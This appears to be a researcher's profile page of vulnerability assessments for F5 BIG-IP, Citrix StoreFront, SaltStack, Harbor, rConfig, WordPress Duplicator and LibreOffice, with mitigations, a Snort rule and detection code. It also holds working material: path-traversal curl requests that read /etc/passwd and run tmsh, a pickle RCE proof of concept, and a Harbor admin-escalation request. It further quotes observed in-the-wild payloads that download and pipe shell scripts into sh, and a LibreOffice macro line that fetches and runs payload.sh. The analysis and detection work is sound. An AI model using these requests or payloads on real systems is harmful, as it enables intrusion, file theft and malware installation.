kevthehermit (108)

Last Login: September 24, 2020
Assessments
29
Score
108
6th Place

kevthehermit's Contributions (36)

4
Ratings
Technical Analysis

BIG-IP platforms with Cavium Nitrox SSL hardware acceleration cards, a virtual server configured with a Client SSL profile, and using Anonymous Diffie-Hellman (ADH) or Ephemeral Diffie-Hellman (DHE) key exchange and Single DH use option not enabled in the options list may be vulnerable to crafted SSL/Transport Layer Security (TLS) handshakes that may result with a pre-master secret (PMS) that starts in a 0 byte and may lead to a recovery of plaintext messages as BIG-IP TLS/SSL ADH/DHE sends different error messages acting as an oracle. Differences in processing time when the PMS starts with 0 byte coupled with very precise timing measurement observation may also expose this vulnerability.

That's a lot to take in …
A recent research study identified a timing attack against TLS that could be used to recover a shared secret that could then be used to recover plaintext of previously captured data.

In order to be successful outside of a testing environment, an attacker would need to intercept encrypted traffic and then send specially crafted TLS packets to a vulnerable server in the hopes of recovering enough data to decrypt the previously intercepted traffic.

Conditions

This vulnerability affects BIG-IP systems with virtual servers associated with a Client SSL profile under the following conditions:

  • You are using ADH or DHE key exchange in the Client SSL profile.

    • Note: DHE is enabled by default in the DEFAULT cipher suite. ADH is not available in the DEFAULT cipher suite.
  • You have not enabled the Single Diffie-Hellman use option—or Single DH use option—in the Client SSL profile.

    • Note: The Single DH use option is not enabled by default in the Client SSL profile options list.
  • Your BIG-IP platform has a Cavium Nitrox SSL hardware acceleration card installed. Platforms with this installed include:

    • BIG-IP i11400-DS, i11600-DS, i11800-DS
    • BIG-IP 1600, 3600, 3900, 5000, 6900, 7000, 8900, 10000, 11000, 12000
    • VIPRION 2100, 2150, 2250, 4100, 4200, 4300

Mitigations

F5 have released a set of mitigations that will prevent this attack on vulnerable servers until they can be patched.

  • Log in to the Configuration utility.
  • Go to Local Traffic > Profiles > SSL > Client.
  • Select the Client SSL profile.
  • In the Configuration list, select Advanced.
  • In the Options section, in the list, select Options List.
  • In the Options List section, under Available Options, select Single DH use, and then select Enable.
  • The Single DH Use option displays under Enabled Options.
  • In Ciphers, in the text box, enter a cipher string that disables ADH or DHE, such as the following example:
    !DHE:!ADH:ALL
  • In Unclean Shutdown, select Enabled.
  • At the bottom of the page, select Update.
3
Ratings
Technical Analysis

This is still a provisional assessment pending more research.

A high severity issue has been discovered in Citrix StoreFront that, if exploited, would allow an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server.

This CVE is for Citrix StoreFront that allows an authenticated user to gain arbitrary file read on to the StoreFront server. This could lead to further compromise depending on the ability to exploit data recovered from the server.

The official statement from Citrix can be found here: https://support.citrix.com/article/CTX277455

Updates are available:

  • Citrix StoreFront 1912 CU1 (1912.0.1000) and later versions of Citrix StoreFront 1912 LTSR
  • Citrix StoreFront 3.0 for 7.6 LTSR CU8 Hotfix (3.0.8001) and later versions of StoreFront 3.0 for 7.6 LTSR
  • Citrix StoreFront 3.12 for 7.15 LTSR CU5 Hotfix (3.12.5001) and later versions of StoreFront 3.12 for 7.15 LTSR

The advisory states that attackers must be authenticated in the same Microsoft Active Directory domain as the StoreFront server; if not, this vulnerability is not exploitable.
This significantly impacts the ability for an attacker to exploit this vulnerability. An attacker would have to be:

  • An insider threat with technical knowledge
  • An attacker that already has authenticated access to the domain
6
Ratings
Technical Analysis

Overview

This one is Critical to patch quickly with a CVSS Score of 10.

If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All versions of BIG-IP from 11.x through 15.x are vulnerable.

Patch & Mitigation

Patches are out, but F5 have also listed a set of mitigation techniques to reduce the attack surface. This takes it from Unauthenticated RCE to Authenticated RCE, which is still bad.

Refer to the F5 Article for details. – https://support.f5.com/csp/article/K52145254

Cloud Services

If you are using AWS, Azure or GCP cloud images, check that the version number is fully patched against the correct version numbers.

  • At the time of Writing AWS MarketPlace version is 15.1.0.2-0.0.9

In the wild POC

Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.

Core Vulnerability

The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built-in functions to gain file read/write, or you can access the web-based shell to create accounts with shell access.

Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:

  • File read
  • File Write
  • tmsh access
curl --insecure  'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'


{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}%           

This doesn’t only affect the login.jsp path; it can be used from anywhere.

curl --insecure  'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' 


{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure  'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
2
Ratings
Technical Analysis

Outline

Untrusted data from the client side is used to create a python pickled object. This can lead to full RCE and compromise of the host. There are some limitations and this is not the default configuration.

Impact

If you can control the input it may be possible to gain code execution on the underlying server. With code execution you can gain full access to the database and its data.

Limitations

  • The helpdesk module is not enabled by default.
  • A valid authenticated account with permissions to access /tickets

Patch

This does not appear to be patched in the latest release, although it has been acknowledged.

POC

It is fairly easy to create a functional POC against this target if the feature is enabled.

Modify the following POC to fit your needs.

import pickle
import base64
import os


class RCE:
    def __reduce__(self):
        cmd = ('curl 172.22.0.1:1234')
        return os.system, (cmd,)


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
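Added here as a defensive counterpart to the POC above (example code, not part of the original assessment): `find_globals` walks a pickle stream's opcodes with `pickletools.genops` to list the globals it would import, without executing anything, and `safe_loads` refuses any global outside an allowlist. The `SAFE_GLOBALS` set and the `Constructed` class are constructed for this example.

```python
import io
import os
import pickle
import pickletools

# Allowlist of (module, name) globals a legitimate payload may reference.
# Constructed for this example; anything else (os/posix/nt.system,
# subprocess.*, builtins.eval, ...) is refused.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}

# Opcodes that push a string; protocol 4+ emits two of them right before STACK_GLOBAL.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def find_globals(data: bytes):
    """List the (module, name) pairs a pickle would import, without executing it.

    Protocols 0-3 carry GLOBAL with "module name" as its argument; protocol 4+
    pushes the module and name strings and then emits STACK_GLOBAL. Memo
    references (BINGET) to earlier strings are not resolved, so an unresolvable
    pair is reported as (None, None), which the allowlist check treats as unsafe.
    """
    found = []
    strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPS:
            strings.append(arg)
        elif opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            if len(strings) >= 2:
                name = strings.pop()
                module = strings.pop()
                found.append((module, name))
            else:
                found.append((None, None))
    return found


def is_safe_pickle(data: bytes) -> bool:
    """True only if every global the stream references is on the allowlist."""
    return all(g in SAFE_GLOBALS for g in find_globals(data))


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global outside SAFE_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_rejected(data: bytes) -> bool:
    """True if safe_loads refuses the stream instead of running its reduce callable."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


class Constructed:
    """Constructed sample of the __reduce__ pattern from the POC above.
    The command is harmless and the object is only inspected, never loaded."""

    def __reduce__(self):
        return os.system, ("echo constructed",)


MALICIOUS = pickle.dumps(Constructed())                 # references <os module>.system
BENIGN = pickle.dumps({"ticket": 42, "tags": ["a", "b"]})
```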
2
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very Low
Technical Analysis

tldr

This is the use of unserialize in PHP on user-supplied data. There is no sequence of code that can be exploited to gain code execution using this method.

Outline

Passing user-controlled data to unserialize in PHP is always a bad idea. However, in order to be exploitable there needs to be additional code that will process the data through the use of Magic Methods. There do not appear to be any dangerous methods that take this data in the current version of the PHP script.

If the base PHP version that is running this application also happens to be a version of PHP vulnerable to https://www.cvedetails.com/cve/CVE-2017-5340/ then there is an increased possibility of gaining code execution using this methodology.

Patch

At the time of release, there is no official patch although third party patches have been made available here

2
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very Low
Technical Analysis

tldr

This is the use of unserialize in PHP on user-supplied data. There is no sequence of code that can be exploited to gain code execution using this method.

Outline

Passing user-controlled data to unserialize in PHP is always a bad idea. However, in order to be exploitable there needs to be additional code that will process the data through the use of Magic Methods. There do not appear to be any dangerous methods that take this data in the current version of the PHP script.

If the base PHP version that is running this application also happens to be a version of PHP vulnerable to https://www.cvedetails.com/cve/CVE-2017-5340/ then there is an increased possibility of gaining code execution using this methodology.

Patch

At the time of release, there is no official patch although third party patches have been made available here

4
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

This one has a name and a website. – https://callstranger.com/

There is also a GitHub repository that has PoC code; this code will scan your local IP range to determine if you have vulnerable devices. Be aware this POC will send data about your network out to a 3rd party. It claims to encrypt this data, but I have not reviewed the implementation.
It may not have a list of internal UPnP devices, but it will have a record of your IP and how much data was sent.

https://github.com/yunuscadirci/CallStranger

Root Cause

A Callback header that can be controlled by the attacker in the UPnP SUBSCRIBE functionality can lead to SSRF-like behaviour.

Threat

DDoS

This seems to be the obvious one that will get picked up by most botnet operators at some point.

DLP

Don’t expect this to be a likely threat; there are easier ways to bypass outgoing DLP restrictions than this.

SSRF-like

Needs more review, but scanning internal ports from Internet-facing UPnP devices could be useful, depending on what data is returned.

4

As public PoCs are now out, I am sharing mine here as well.

https://github.com/kevthehermit/CVE-2020-11651

2

Active exploits in the wild have now been observed.

https://twitter.com/KevTheHermit/status/1256873327991443456

Payload is a CryptoMiner.

Base Command "(curl -s 217.12.210.192/sa.sh||wget -q -O- 217.12.210.192/sa.sh)|sh"
Miner Download – https://bitbucket.org/samk12dd/git/src/master/salt-store

10
Ratings
Technical Analysis

Overview

For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.

If a salt-master has its ZeroMQ port 4506 exposed to the public, it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.

This requires multiple socket requests: one to read the key and then additional requests to create jobs.

Proof Of Concept

This POC was tested on SaltStack 2019.2.0.

As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – https://github.com/kevthehermit/CVE-2020-11651

The POC (and others that I am sure will appear shortly) has the following functionality:

  • Read the root key
  • Read and Write files on the Salt Master
  • Construct a payload to gain full RCE as root on any connected Minion

This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/

Mitigations:

Patch to the latest versions and do not expose these ports to the external network.

Detections

Examine /var/cache/salt/master/jobs/ on the salt master for a listing of all jobs. The return.p file in these dirs will contain a detailed description of the request and the response. This data is serialised.

Immersive Labs have released a basic python script to parse all these job files – https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/

# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::

Snort Rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)

On the wire it looks a bit like this, so a stronger rule can be created:
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'

In the wild

The following IPs have been observed sending malicious payloads. Other IPs have been seen scanning.


Payloads

The following Payloads have been observed

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
  • import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)
  • /bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='
  • (curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh
  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
  • (curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh
  • /bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]
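Added example (not part of the assessment or of Salt itself): a minimal msgpack decoder for the few types these messages use, so the clear-channel frame quoted above can be parsed into its `{'enc': 'clear', 'load': {'cmd': '_prep_auth_info'}}` structure and matched structurally rather than on a bare content string, and so a return.p job record can be checked for file_roots reads that escape the file root with `..`. The return.p bytes below are hand-encoded for this example, modelled on the job record shown above.

```python
import struct


def _decode(buf: bytes, pos: int):
    """Decode one msgpack value at buf[pos]; return (value, next_pos).
    Only the types Salt's clear-channel requests and return.p files use."""
    b = buf[pos]
    pos += 1
    if b <= 0x7F:                                  # positive fixint
        return b, pos
    if 0x80 <= b <= 0x8F:                          # fixmap
        return _decode_map(buf, pos, b & 0x0F)
    if 0x90 <= b <= 0x9F:                          # fixarray
        return _decode_array(buf, pos, b & 0x0F)
    if 0xA0 <= b <= 0xBF:                          # fixstr
        n = b & 0x1F
        return buf[pos:pos + n].decode("utf-8"), pos + n
    if b == 0xC0:
        return None, pos
    if b == 0xC2:
        return False, pos
    if b == 0xC3:
        return True, pos
    if b in (0xC4, 0xD9):                          # bin8 / str8
        n = buf[pos]
        pos += 1
        raw = buf[pos:pos + n]
        return (raw if b == 0xC4 else raw.decode("utf-8")), pos + n
    if b in (0xC5, 0xDA):                          # bin16 / str16
        n = struct.unpack_from(">H", buf, pos)[0]
        pos += 2
        raw = buf[pos:pos + n]
        return (raw if b == 0xC5 else raw.decode("utf-8")), pos + n
    if b == 0xCC:                                  # uint8
        return buf[pos], pos + 1
    if b == 0xCD:                                  # uint16
        return struct.unpack_from(">H", buf, pos)[0], pos + 2
    if b == 0xCE:                                  # uint32
        return struct.unpack_from(">I", buf, pos)[0], pos + 4
    if b == 0xDC:                                  # array16
        n = struct.unpack_from(">H", buf, pos)[0]
        return _decode_array(buf, pos + 2, n)
    if b == 0xDE:                                  # map16
        n = struct.unpack_from(">H", buf, pos)[0]
        return _decode_map(buf, pos + 2, n)
    raise ValueError(f"unsupported msgpack type byte 0x{b:02x} at offset {pos - 1}")


def _decode_array(buf, pos, n):
    items = []
    for _ in range(n):
        value, pos = _decode(buf, pos)
        items.append(value)
    return items, pos


def _decode_map(buf, pos, n):
    out = {}
    for _ in range(n):
        key, pos = _decode(buf, pos)
        value, pos = _decode(buf, pos)
        out[key] = value
    return out, pos


def unpack(buf: bytes):
    """Decode a whole msgpack message."""
    value, _pos = _decode(buf, 0)
    return value


def is_root_key_read(frame: bytes) -> bool:
    """True when a frame on 4506 is the unauthenticated _prep_auth_info call
    the Snort rule above keys on: enc == 'clear' and load.cmd == '_prep_auth_info'."""
    try:
        msg = unpack(frame)
    except (ValueError, IndexError, UnicodeDecodeError):
        return False
    return (isinstance(msg, dict) and msg.get("enc") == "clear"
            and isinstance(msg.get("load"), dict)
            and msg["load"].get("cmd") == "_prep_auth_info")


def suspicious_job(return_p: bytes) -> bool:
    """Flag a return.p record whose file_roots read/write escapes the root via '..'."""
    job = unpack(return_p).get("return", {})
    if job.get("fun") not in ("wheel.file_roots.read", "wheel.file_roots.write"):
        return False
    return any(".." in str(arg) for arg in job.get("fun_args", []))


# The clear-channel request bytes quoted in the assessment above.
WIRE_SAMPLE = b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'

# Constructed return.p record, hand-encoded, modelled on the job shown above.
JOB_SAMPLE = (b'\x81\xa6return\x83'
              b'\xa3fun\xb5wheel.file_roots.read'
              b'\xa8fun_args\x91\xb6../../../../etc/shadow'
              b'\xa4user\xa7UNKNOWN')
```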
1
Ratings
Technical Analysis

There are a lot of moving parts to be able to exploit this, but if successful it will give an attacker a container escape onto the kube host.
An attacker must already have shell access to a container and there must be a process running from the host that uses the kubectl cp command.
This is occasionally seen used to copy files like log files out of a container to the host for backup or additional processing.

If a user can replace the tar binary in the container it is possible to perform actions like editing the .bashrc file on the host. This could be used to create new SSH accounts or establish a reverse shell as that user, typically with root permissions.

1
Ratings
Technical Analysis

There are three specific requirements for an application to be vulnerable:

  • Vulnerable version
  • Using a Database for storage
  • Self Registration enabled.

Self-registration is not a very common setting but it has been seen.

If you are able to register your own account it is trivial to modify a POST request and elevate yourself to admin permissions.

POST /api/users HTTP/1.1
Host: 10.102.7.190
Content-Type: application/json
Content-Length: 95
Connection: close


{"username":"Tom","email":"Tom@demo.local","realname":"Tom","password":"Password1","comment":null, "has_admin_role":"true"}

If you have access to the repository as an admin you can manipulate the containers and even gain further access into the network if you can read and/or modify any of the containers or their secrets.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

rConfig reports almost 3.5 million devices managed by this utility. A search of Shodan reveals there are several dozen instances exposed directly to the internet on a vulnerable version.

This exploit allows RCE on the host. If you can gain host access you can read the database keys in ./config/config.inc.php and then access the database.

By design the database contains the details for all of your network devices. It also contains clear text credentials for access to these devices.

MariaDB [rconfig]> select deviceUsername, deviceName, devicePassword, deviceEnablePassword, deviceIpAddr from nodes;
+----------------+------------+----------------+----------------------+--------------+
| deviceUsername | deviceName | devicePassword | deviceEnablePassword | deviceIpAddr |
+----------------+------------+----------------+----------------------+--------------+
| admin          | Primary    | password       | password             | 10.10.10.10  |
+----------------+------------+----------------+----------------------+--------------+
1 row in set (0.00 sec)

MariaDB [rconfig]> 

This then permits any attacker to gain access to a wide range of internal network devices.
As rConfig is typically seen to access these devices it is easy for an attacker to hide amongst the background noise.

1
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Low
Technical Analysis

SQLAlchemy is one of the most popular ORMs for Python / SQL Database interaction. It is heavily used in python web applications with frameworks like Flask and Django.

ORMs are heavily used as they remove the need for raw queries, which also adds input sanitization as part of the process.

This specific exploit would allow SQL Injection if an attacker can control the input sent to group_by, as this field was not being filtered. This could result in full DB compromise including the compromise of credentials.

Whilst the use of SQLAlchemy is fairly common the specific requirements around the version and the group_by parameter being accessible to an end-user may not be as common.

1
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Medium
Technical Analysis

This forms the basis of a social engineering attack. It requires LibreOffice and Python installed, which means a limited pool of target victims. However, this is a common setup on Linux desktop environments, which may make developers a target.

To exploit this vulnerability, an attacker creates a document with a text-written command and a hyperlink that, upon user mouseover, runs a program through the LibreLogo extension. When a user loads up the document in a program such as LibreOffice Writer, the macro is enabled automatically.

The hyperlink is set to include the macro LibreLogo:run. This in turn runs the previous text command through LibreLogo as if it’s attempting to use the information to create turtle vector graphics. This causes whatever is being called in the text command to run – be it malware, a program, or a malicious file download.

An example extract from an odt file can be seen below:

   <txt ptr="0x4e9a180" id="3" symbol="11SwTextFrame" next="10" upper="2" txtNodeIndex="9">
    <infos>
     <bounds left="8181" top="1418" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
import os    <Text nLength="9" nType="POR_PARA" nHeight="299" nWidth="989" Portion="import os"/>
    <LineBreak nWidth="989" Line="import os"/>
    <Finish/>
   </txt>
   <txt ptr="0x7c6e450" id="10" symbol="11SwTextFrame" next="15" prev="3" upper="2" txtNodeIndex="10">
    <infos>
     <bounds left="8181" top="1717" width="9638" height="598" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="598"/>
    </infos>
os.system(“wget http://immersivemalware.bad:8001/payload.sh ; chmod +x payload.sh ; ./payload.sh”)    <Text nLength="84" nType="POR_PARA" nHeight="299" nWidth="9264" Portion="os.system(&#x201C;wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <LineBreak nWidth="9264" Line="os.system(&#x201C;wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <Text nLength="14" nType="POR_LAY" nHeight="299" nWidth="1458" Portion="./payload.sh&#x201D;)"/>
    <LineBreak nWidth="1458" Line="./payload.sh&#x201D;)"/>
    <Finish/>
   </txt>
   <txt ptr="0x4e2ac00" id="15" symbol="11SwTextFrame" prev="10" upper="2" txtNodeIndex="11">
    <infos>
     <bounds left="8181" top="2315" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
Run    <Text nLength="3" nType="POR_PARA" nHeight="299" nWidth="434" Portion="Run"/>
    <LineBreak nWidth="434" Line="Run"/>
    <Finish/>
   </txt>
3

I had not seen any POC code listed for this, but it is incredibly simple to exploit based on the published details.

In [15]: import requests

In [16]: base_url = "http://172.17.0.2"

In [17]: params = {"action": "duplicator_download", "file": "/../../../../etc/passwd"}

In [18]: requests.get(base_url, params=params).text
Out[18]: 'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nmysql:x:101:101:MySQL Server,,,:/var/lib/mysql/:/bin/false\n'

In [19]: 

File read is still only in the context of the web server, so it's typically not going to be root.

1

Thank you, I agree that over time I would not expect to continuously adjust the scores and I completely agree with your statements, I just think that it would be useful for others who may not know to include that kind of detail in the initial analysis.

1

Thanks,

Can you add any more context to this report that would help people understand the risks with this exploit?
As it is from 2010 I would not expect it to have significant attacker value or be common in enterprise environments any more.

1

In your analysis you stated that this is common in enterprise. Is this still the case? Whilst I can accept that there will be some organisations that are running legacy, I feel that this will no longer be common, and therefore its attacker value is decreased?

Or do we think that it is still a very large threat surface for enterprise?

4
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Very High
Technical Analysis

This plugin is recorded as having over 1 million installations via WordPress – https://wordpress.org/plugins/duplicator/
It has a free and a pro version with both being impacted.

Other reporting suggests that there are around 170,000 active installations, with ~150,000 of these not on the latest version.

The vulnerability allows arbitrary file read of any file on disk in the context of the web application. This kind of attack can lead to further compromise depending on its setup and configuration. Using this level of access can lead to database credentials being compromised which in turn can lead to further exploitation.

This exploit has been seen in active campaigns as reported by Wordfence – https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/

IOCs shared by WordPress and replicated here for ease of discovery.

Indicators Of Compromise (IOCs)
